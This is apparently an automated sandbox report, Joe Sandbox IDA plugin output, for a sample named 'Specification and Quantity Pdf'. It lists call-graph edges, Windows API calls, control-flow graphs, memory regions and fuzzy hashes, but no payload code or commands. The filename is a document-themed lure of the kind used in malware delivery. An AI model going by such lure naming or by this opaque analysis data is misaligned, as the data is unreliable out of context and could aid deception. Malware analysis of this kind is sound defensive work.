7ff773c62ce2 29796->29797 29798 7ff773c5c1a0 18 API calls 29797->29798 29799 7ff773c62d0b 29798->29799 29800 7ff773c5c1a0 18 API calls 29799->29800 29801 7ff773c62d34 29800->29801 29802 7ff773c5c1a0 18 API calls 29801->29802 29803 7ff773c62d5d 29802->29803 29804 7ff773c5c1a0 18 API calls 29803->29804 29805 7ff773c62d86 29804->29805 29806 7ff773c5c1a0 18 API calls 29805->29806 29807 7ff773c62daf 29806->29807 29808 7ff773c5c1a0 18 API calls 29807->29808 29809 7ff773c62dd8 29808->29809 29810 7ff773c5c1a0 18 API calls 29809->29810 29811 7ff773c62e01 29810->29811 29812 7ff773c5c1a0 18 API calls 29811->29812 29813 7ff773c62e2a 29812->29813 29814 7ff773c5c1a0 18 API calls 29813->29814 29815 7ff773c62e53 29814->29815 29816 7ff773c5c1a0 18 API calls 29815->29816 29817 7ff773c62e7c 29816->29817 29818 7ff773c5c1a0 18 API calls 29817->29818 29819 7ff773c62ea5 29818->29819 29820 7ff773c5c1a0 18 API calls 29819->29820 29821 7ff773c62ece 29820->29821 29822 7ff773c5c1a0 18 API calls 29821->29822 29823 7ff773c62ef7 29822->29823 29824 7ff773c5c1a0 18 API calls 29823->29824 29825 7ff773c62f20 29824->29825 29826 7ff773c5c1a0 18 API calls 29825->29826 29827 7ff773c62f49 29826->29827 29828 7ff773c5c1a0 18 API calls 29827->29828 29829 7ff773c62f72 29828->29829 29830 7ff773c5c1a0 18 API calls 29829->29830 29831 7ff773c62f9b 29830->29831 29832 7ff773c5c1a0 18 API calls 29831->29832 29833 7ff773c62fc4 29832->29833 29834 7ff773c5c1a0 18 API calls 29833->29834 29835 7ff773c62fed 29834->29835 29836 7ff773c5c1a0 18 API calls 29835->29836 29837 7ff773c63016 29836->29837 29838 7ff773c5c1a0 18 API calls 29837->29838 29839 7ff773c6303f 29838->29839 29840 7ff773c5c1a0 18 API calls 29839->29840 29841 7ff773c63068 29840->29841 29842 7ff773c5c1a0 18 API calls 29841->29842 29843 7ff773c63096 29842->29843 29844 7ff773c5c1a0 18 API calls 29843->29844 29845 7ff773c630c4 29844->29845 29846 7ff773c5c1a0 18 API calls 29845->29846 29847 7ff773c630f2 29846->29847 29848 7ff773c5c1a0 18 API calls 29847->29848 29849 7ff773c63120 29848->29849 29850 7ff773c5c1a0 18 API calls 29849->29850 29851 7ff773c6314e 29850->29851 29852 7ff773c5c1a0 18 API calls 29851->29852 29853 7ff773c6317c 29852->29853 29854 7ff773c5c1a0 18 API calls 29853->29854 29855 7ff773c631a5 29854->29855 29856 7ff773c5c1a0 18 API calls 29855->29856 29857 7ff773c631d3 29856->29857 29858 7ff773c5c1a0 18 API calls 29857->29858 29859 7ff773c631fc 29858->29859 29860 7ff773c5c1a0 18 API calls 29859->29860 29861 7ff773c63225 29860->29861 29862 7ff773c5c1a0 18 API calls 29861->29862 29863 7ff773c5b845 29862->29863 29864 7ff773c61460 GetSystemInfo 29863->29864 29865 7ff773c614a4 29864->29865 29866 7ff773c614ce GetCurrentProcess GetProcessGroupAffinity 29865->29866 29867 7ff773c614a8 GetNumaHighestNodeNumber 29865->29867 29869 7ff773c614f9 GetLastError 29866->29869 29870 7ff773c61504 29866->29870 29867->29866 29868 7ff773c614b7 29867->29868 29868->29866 29869->29870 29871 7ff773c61526 29870->29871 29903 7ff773c61240 GetLogicalProcessorInformationEx GetLastError GetLogicalProcessorInformationEx ISource 29870->29903 29873 7ff773c61590 GetCurrentProcess GetProcessAffinityMask 29871->29873 29874 7ff773c5b84a 29871->29874 29873->29874 29874->29671 29874->29677 29876 7ff773c5c0f4 29875->29876 29877 7ff773c5c0f8 29876->29877 29878 7ff773c5ced0 8 API calls 29876->29878 29877->29731 29879 7ff773c5c124 29878->29879 29879->29731 29881 7ff773c5c1ca 29880->29881 29882 7ff773c5c2df 29880->29882 29883 7ff773c5c1d7 strcmp 29881->29883 29884 7ff773c5c1ef 29881->29884 29885 7ff773c5ced0 8 API calls 29882->29885 29883->29884 29888 7ff773c5c1e7 29883->29888 29886 7ff773c5c1fc strcmp 29884->29886 29887 7ff773c5c20f 29884->29887 29889 7ff773c5c2f6 29885->29889 29886->29887 29886->29888 29890 7ff773c5c21c strcmp 29887->29890 29891 7ff773c5c22f 29887->29891 29888->29756 29889->29888 29902 7ff773c5d050 _stricmp strtoull 29889->29902 29890->29888 29890->29891 29892 7ff773c5c23c strcmp 29891->29892 29893 7ff773c5c24f 29891->29893 29892->29888 29892->29893 29895 7ff773c5c25c strcmp 29893->29895 29896 7ff773c5c273 29893->29896 29895->29888 29895->29896 29897 7ff773c5c297 29896->29897 29898 7ff773c5c280 strcmp 29896->29898 29899 7ff773c5c2bb 29897->29899 29900 7ff773c5c2a4 strcmp 29897->29900 29898->29888 29898->29897 29899->29882 29901 7ff773c5c2c8 strcmp 29899->29901 29900->29888 29900->29899 29901->29882 29901->29888 29902->29888 29903->29871 29904->29689 29905->29700 29943 7ff773c63d70 29906->29943 29908 7ff773c5c44b 29908->29715 29909 7ff773c69340 29908->29909 29910 7ff773c60130 4 API calls 29909->29910 29911 7ff773c69355 29910->29911 29952 7ff773c61650 QueryPerformanceFrequency 29911->29952 29913 7ff773c6935a 29916 7ff773c693fc 29913->29916 29953 7ff773c61010 29913->29953 29915 7ff773c69442 29915->29716 29916->29915 29920 7ff773c694e9 29916->29920 29991 7ff773c61200 9 API calls 29916->29991 29918 7ff773c69527 29918->29920 29992 7ff773c61200 9 API calls 29918->29992 29921 7ff773c69598 ISource 29920->29921 29967 7ff773c81560 29920->29967 29921->29716 29923 7ff773c69634 29923->29921 29924 7ff773cbac48 _swprintf_c_l 3 API calls 29923->29924 29925 7ff773c6969a 29924->29925 29925->29921 29993 7ff773c60c50 29925->29993 29927 7ff773c696bd 29927->29921 29998 7ff773c7fdd0 16 API calls _swprintf_c_l 29927->29998 29930 7ff773c55732 29929->29930 29931 7ff773c5576d 29930->29931 30096 7ff773c60700 CreateEventW 29930->30096 29931->29718 29933 7ff773c55744 29933->29931 30097 7ff773c5ba80 CreateThread 29933->30097 29935 7ff773c55763 29935->29718 29937 7ff773c5db07 29936->29937 29938 7ff773c5db0f 29937->29938 29939 7ff773cbac48 _swprintf_c_l 3 API calls 29937->29939 29938->29719 29942 7ff773c5db41 29939->29942 29940 7ff773c5dbd5 ISource 29940->29719 29942->29940 30100 7ff773c641d0 29942->30100 29948 7ff773c64aa0 29943->29948 29946 7ff773c63daf 29946->29908 29949 7ff773cbac48 _swprintf_c_l 3 API calls 29948->29949 29950 7ff773c63d98 29949->29950 29950->29946 29951 7ff773c665d0 malloc RtlPcToFileHeader RaiseException _swprintf_c_l 29950->29951 29951->29946 29952->29913 29954 7ff773c61048 GetCurrentProcess IsProcessInJob 29953->29954 29955 7ff773c61045 29953->29955 29956 7ff773c61079 29954->29956 29957 7ff773c61120 29954->29957 29955->29954 29956->29957 29960 7ff773c61083 QueryInformationJobObject 29956->29960 29958 7ff773c61159 29957->29958 29959 7ff773c61130 GlobalMemoryStatusEx 29957->29959 29961 7ff773c61179 GlobalMemoryStatusEx 29958->29961 29963 7ff773c6116c 29958->29963 29959->29958 29960->29957 29964 7ff773c610a5 29960->29964 29961->29963 29962 7ff773c610e9 GlobalMemoryStatusEx 29962->29957 29999 7ff773cbacf0 8 API calls 2 library calls 29963->29999 29964->29957 29964->29962 29966 7ff773c611bb 29966->29916 29968 7ff773c8157d 29967->29968 30000 7ff773c616a0 VirtualAlloc 29968->30000 29970 7ff773c815a3 29971 7ff773c815f6 29970->29971 30077 7ff773c61440 InitializeCriticalSection 29970->30077 30003 7ff773c61440 InitializeCriticalSection 29971->30003 29974 7ff773c81602 29975 7ff773c81a28 29974->29975 30004 7ff773c92260 29974->30004 29975->29923 29977 7ff773c81631 _swprintf_c_l 29990 7ff773c8186f 29977->29990 30014 7ff773c81260 29977->30014 29979 7ff773c81804 30018 7ff773c617b0 29979->30018 29981 7ff773c8183e 29981->29990 30021 7ff773c81a50 29981->30021 29983 7ff773c81860 29984 7ff773c81864 29983->29984 29986 7ff773c81893 29983->29986 30078 7ff773c61790 VirtualFree 29984->30078 29986->29990 30039 7ff773c94e60 29986->30039 29990->29923 29991->29918 29992->29920 29994 7ff773cbac48 _swprintf_c_l 3 API calls 29993->29994 29995 7ff773c60c76 29994->29995 29996 7ff773c60c7e CreateEventW 29995->29996 29997 7ff773c60ca0 ISource 29995->29997 29996->29997 29997->29927 29998->29921 29999->29966 30001 7ff773c616d9 30000->30001 30002 7ff773c616c1 VirtualFree 30000->30002 30001->29970 30002->29970 30003->29974 30005 7ff773c9228f 30004->30005 30006 7ff773c922b2 30005->30006 30007 7ff773c922bc 30005->30007 30012 7ff773c922e7 30005->30012 30079 7ff773c61830 18 API calls 30006->30079 30009 7ff773c617b0 3 API calls 30007->30009 30011 7ff773c922cd 30009->30011 30010 7ff773c922ba 30010->30011 30011->30012 30080 7ff773c61790 VirtualFree 30011->30080 30012->29977 30016 7ff773c8127f 30014->30016 30017 7ff773c8129c 30016->30017 30081 7ff773c60d10 GetLogicalProcessorInformation GetLastError GetLogicalProcessorInformation ISource 30016->30081 30017->29979 30019 7ff773c617f4 GetCurrentProcess VirtualAllocExNuma 30018->30019 30020 7ff773c617d5 VirtualAlloc 30018->30020 30019->29981 30020->30019 30022 7ff773c81a85 30021->30022 30023 7ff773c81a89 30022->30023 30026 7ff773c81aa3 30022->30026 30082 7ff773cbacf0 8 API calls 2 library calls 30023->30082 30025 7ff773c81a9b 30025->29983 30027 7ff773c81ae3 EnterCriticalSection 30026->30027 30028 7ff773c81b10 LeaveCriticalSection 30026->30028 30029 7ff773c616e0 3 API calls 30026->30029 30030 7ff773c81c19 LeaveCriticalSection 30026->30030 30032 7ff773c81bef 30026->30032 30035 7ff773c81b61 30026->30035 30027->30026 30027->30028 30028->30026 30029->30026 30036 7ff773c81c25 30030->30036 30034 7ff773c81bf8 EnterCriticalSection 30032->30034 30032->30036 30033 7ff773c81be7 30033->29983 30034->30030 30083 7ff773cbacf0 8 API calls 2 library calls 30035->30083 30036->30035 30038 7ff773c81c5d EnterCriticalSection LeaveCriticalSection 30036->30038 30084 7ff773c61770 VirtualFree 30036->30084 30038->30036 30085 7ff773c94da0 30039->30085 30042 7ff773c80c50 30045 7ff773c80c75 30042->30045 30043 7ff773c81225 30094 7ff773c60bb0 CloseHandle 30043->30094 30044 7ff773c81231 30047 7ff773c8123a 30044->30047 30048 7ff773c81246 30044->30048 30050 7ff773c60c50 4 API calls 30045->30050 30075 7ff773c80cdb 30045->30075 30095 7ff773c60bb0 CloseHandle 30047->30095 30048->29990 30051 7ff773c80d1b 30050->30051 30052 7ff773c60c50 4 API calls 30051->30052 30051->30075 30053 7ff773c80d31 _swprintf_c_l 30052->30053 30054 7ff773c60e30 10 API calls 30053->30054 30053->30075 30055 7ff773c81050 30054->30055 30056 7ff773c60c50 4 API calls 30055->30056 30057 7ff773c810cd 30056->30057 30058 7ff773c8110f 30057->30058 30059 7ff773c60c50 4 API calls 30057->30059 30060 7ff773c811dd 30058->30060 30061 7ff773c811d1 30058->30061 30058->30075 30062 7ff773c810e3 30059->30062 30064 7ff773c811e6 30060->30064 30065 7ff773c811f2 30060->30065 30090 7ff773c60bb0 CloseHandle 30061->30090 30062->30058 30089 7ff773c60bd0 4 API calls 2 library calls 30062->30089 30091 7ff773c60bb0 CloseHandle 30064->30091 30067 7ff773c811fb 30065->30067 30068 7ff773c81207 30065->30068 30092 7ff773c60bb0 CloseHandle 30067->30092 30070 7ff773c81210 30068->30070 30068->30075 30093 7ff773c60bb0 CloseHandle 30070->30093 30073 7ff773c810f9 30073->30058 30074 7ff773c60c50 4 API calls 30073->30074 30074->30058 30075->30043 30075->30044 30076 7ff773c811ae 30075->30076 30076->29990 30077->29971 30078->29990 30079->30010 30080->30012 30081->30017 30082->30025 30083->30033 30084->30036 30086 7ff773c94db9 30085->30086 30088 7ff773c81a07 30085->30088 30087 7ff773c94dd0 GetEnabledXStateFeatures 30086->30087 30086->30088 30087->30088 30088->30042 30089->30073 30090->30060 30091->30065 30092->30068 30093->30075 30094->30044 30095->30048 30096->29933 30098 7ff773c5bab5 SetThreadPriority ResumeThread CloseHandle 30097->30098 30099 7ff773c5baaf 30097->30099 30098->29935 30099->29935 30102 7ff773c64203 _swprintf_c_l 30100->30102 30101 7ff773c64229 ISource _swprintf_c_l 30101->29942 30102->30101 30106 7ff773c65180 30102->30106 30104 7ff773c64220 30104->30101 30105 7ff773c5c8a0 InitializeCriticalSectionEx 30104->30105 30105->30101 30107 7ff773c617b0 3 API calls 30106->30107 30108 7ff773c651a2 30107->30108 30109 7ff773c651aa 30108->30109 30110 7ff773c616e0 3 API calls 30108->30110 30109->30104 30111 7ff773c651c8 30110->30111 30114 7ff773c651d3 _swprintf_c_l 30111->30114 30115 7ff773c61790 VirtualFree 30111->30115 30113 7ff773c652ee 30113->30104 30114->30104 30115->30113 30116->29724 30288 7ff773c53540 6 API calls

            Control-flow Graph

            APIs
            • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C6146F
            • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614AD
            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614D9
            • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614EA
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C614F9
            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF773C5B84A), ref: 00007FF773C61590
            • GetProcessAffinityMask.KERNEL32 ref: 00007FF773C615A3
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
            • String ID:
            • API String ID: 580471860-0
            • Opcode ID: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
            • Instruction ID: 13bdea4bb41cb6a1f4785b5adc762ee5044f75f709ce6a01bfd1e6520869331f
            • Opcode Fuzzy Hash: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
            • Instruction Fuzzy Hash: E9515C73A3CA46C6EA91AF65E850169F3A1FB44789FC44032D94EAB395EF2CE454C720
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakDebug
            • String ID: END
            • API String ID: 456121617-2522575163
            • Opcode ID: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
            • Instruction ID: 1b5229edf5d2d9759f3188edd9969a8e73fe59a80e14b2a64521f23126661339
            • Opcode Fuzzy Hash: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
            • Instruction Fuzzy Hash: 18829833E3DB4686EAD0BBA8A844274B3A0AF45B95F944236C94D633E4DF3CE455C360
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3168844106-0
            • Opcode ID: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
            • Instruction ID: 83d2e5893211101837aaaed5874c4459d3e75a044e8aece99d44667170a7ea57
            • Opcode Fuzzy Hash: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
            • Instruction Fuzzy Hash: 3FB23C63A3DB4685EE90AB64E850279B7A4FF44B84F944636DE4C277A4DF3CE461C320

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1039 7ff773c69340-7ff773c6936a call 7ff773c60130 call 7ff773c61650 1044 7ff773c6936c-7ff773c69371 1039->1044 1045 7ff773c69373-7ff773c69384 1039->1045 1046 7ff773c69388-7ff773c693a2 1044->1046 1045->1046 1047 7ff773c693ab-7ff773c693bc 1046->1047 1048 7ff773c693a4-7ff773c693a9 1046->1048 1049 7ff773c693c0-7ff773c693fa call 7ff773c5c190 call 7ff773c611e0 call 7ff773c626a0 1047->1049 1048->1049 1056 7ff773c6940c-7ff773c69413 call 7ff773c61010 1049->1056 1057 7ff773c693fc-7ff773c6940a 1049->1057 1061 7ff773c69418 1056->1061 1058 7ff773c6941f-7ff773c69440 call 7ff773c75d00 1057->1058 1063 7ff773c6944c-7ff773c6946d call 7ff773c62720 call 7ff773c63440 1058->1063 1064 7ff773c69442-7ff773c6944b 1058->1064 1061->1058 1069 7ff773c69476-7ff773c694a4 call 7ff773c75f00 1063->1069 1070 7ff773c6946f 1063->1070 1073 7ff773c694b9-7ff773c694d7 call 7ff773c63410 call 7ff773c62670 1069->1073 1074 7ff773c694a6-7ff773c694a8 1069->1074 1070->1069 1080 7ff773c6955d-7ff773c69596 call 7ff773c63420 call 7ff773c63430 call 7ff773c62560 call 7ff773c62680 1073->1080 1081 7ff773c694dd-7ff773c694e7 1073->1081 1074->1073 1075 7ff773c694aa-7ff773c694b8 1074->1075 1102 7ff773c69598-7ff773c695b0 1080->1102 1103 7ff773c695b1-7ff773c695c0 1080->1103 1083 7ff773c694e9-7ff773c694f0 1081->1083 1084 7ff773c69506-7ff773c6952d call 7ff773c61200 1081->1084 1086 7ff773c6954a-7ff773c69556 1083->1086 1087 7ff773c694f2-7ff773c694f9 1083->1087 1094 7ff773c69539-7ff773c69546 1084->1094 1095 7ff773c6952f-7ff773c69537 call 7ff773c61200 1084->1095 1086->1080 1090 7ff773c694fb-7ff773c694fe 1087->1090 1091 7ff773c69500-7ff773c69504 1087->1091 1090->1086 1091->1086 1094->1086 1095->1086 1104 7ff773c695f1-7ff773c695f8 1103->1104 1105 7ff773c695c2-7ff773c695d3 1103->1105 1108 7ff773c695fe-7ff773c69609 1104->1108 1109 7ff773c69724 1104->1109 1106 7ff773c695dc-7ff773c695ef 1105->1106 1107 7ff773c695d5-7ff773c695da 1105->1107 1106->1108 1107->1108 1108->1109 1110 7ff773c6960f-7ff773c6962f call 7ff773c81560 1108->1110 1111 7ff773c69729-7ff773c69741 1109->1111 1113 7ff773c69634-7ff773c69668 call 7ff773c633d0 call 7ff773c63400 call 7ff773c633e0 call 7ff773c633f0 1110->1113 1122 7ff773c6966e-7ff773c6969d call 7ff773c62660 call 7ff773cbac48 1113->1122 1123 7ff773c69719-7ff773c6971b 1113->1123 1128 7ff773c6971d 1122->1128 1129 7ff773c6969f-7ff773c696b1 call 7ff773c60b90 1122->1129 1123->1111 1128->1109 1129->1109 1132 7ff773c696b3-7ff773c696bf call 7ff773c60c50 1129->1132 1135 7ff773c696d4-7ff773c696ff call 7ff773c7fdd0 1132->1135 1136 7ff773c696c1-7ff773c696d2 call 7ff773c52c80 1132->1136 1141 7ff773c69706-7ff773c69708 1135->1141 1142 7ff773c69701 call 7ff773cbac40 1135->1142 1136->1111 1141->1123 1144 7ff773c6970a-7ff773c69714 call 7ff773c94840 call 7ff773c52c80 1141->1144 1142->1141 1144->1123
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
            • String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
            • API String ID: 133006248-518909315
            • Opcode ID: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
            • Instruction ID: d34a57f4efc1e7e54e26083013080298cc1b6b8f0be809c7018d09ca94d2b4f1
            • Opcode Fuzzy Hash: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
            • Instruction Fuzzy Hash: 35B16D23E3DB4682FAD1BBA4A451279F291AF45788FC40276D58E273E2DF2DF0518360
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID: %_
            • API String ID: 0-4145416222
            • Opcode ID: ab9d3395acc446df8bbb42c9f9c476036a8486221088c5072eea3ff1e419bc9a
            • Instruction ID: b7bb931ff0a8140df93203689ec6fafd5bbec9cc3e076621048c528e9c481848
            • Opcode Fuzzy Hash: ab9d3395acc446df8bbb42c9f9c476036a8486221088c5072eea3ff1e419bc9a
            • Instruction Fuzzy Hash: 9962BF73A3C64686EAE5AB75A441339F7A1BF45785F908136DD4E733A0EF3CA460C620
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID:
            • API String ID: 2299586839-0
            • Opcode ID: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
            • Instruction ID: 358de722d05ce44588f026e6fcc33124811e8818d1ffe03dfd4b39dc326ea66f
            • Opcode Fuzzy Hash: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
            • Instruction Fuzzy Hash: C2219F33A39A9099D7A4EF65EC015E977A4FB48398F900236FE4D93A89DF38D491C350
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CurrentProcess
            • String ID:
            • API String ID: 2050909247-0
            • Opcode ID: c0ad0a1e25142008f3637e5da2c3db878e0901c6b4a0cb550b565114e147fb9e
            • Instruction ID: 7d50b972f858d0091c160398887052a70e94067a18dd7462ad9aa2eea54d5a11
            • Opcode Fuzzy Hash: c0ad0a1e25142008f3637e5da2c3db878e0901c6b4a0cb550b565114e147fb9e
            • Instruction Fuzzy Hash: F002A363E3C60A86FAD5ABA5A844278F7A2AF45780F944637D44D332A0DF3CB561C670
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
